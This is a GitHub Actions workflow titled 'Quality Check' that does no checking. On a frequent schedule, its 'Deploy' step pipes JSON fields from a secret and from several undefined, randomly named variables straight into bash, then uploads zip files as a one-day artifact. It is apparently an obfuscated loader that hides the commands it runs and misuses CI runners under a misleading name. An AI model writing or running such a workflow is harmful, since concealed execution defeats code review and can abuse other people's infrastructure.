name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '49 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          xp3: ${{ secrets.xp3 }}
        run: |
          printf '%s' "$xp3" | jq -r .nnp54049 | /bin/bash
          echo $byv3 | jq -r .wur889 | /bin/bash
          echo $ug61 | jq -r .kq1142 | /bin/bash
          echo $otx4469 | jq -r .e4 | /bin/bash
          echo $oyd1530 | jq -r .bko8289 | /bin/bash
          echo $sgc63 | jq -r .pbq86844 | /bin/bash
          echo $m4 | jq -r .gj5 | /bin/bash
          echo $mrqg7450 | jq -r .x0 | /bin/bash
          printf '%s' "$liwvq2" | jq -r .odn86615 | /bin/bash
          printf '%s' "$oir8472" | jq -r .yugga8 | /bin/bash
          printf '%s' "$jnc6782" | jq -r .wqq336 | /bin/bash
          echo $gq64 | jq -r .eqt2879 | /bin/bash
          printf '%s' "$rduz580" | jq -r .z86 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: Tdl93Ith
          path: "*.zip"
          retention-days: 1
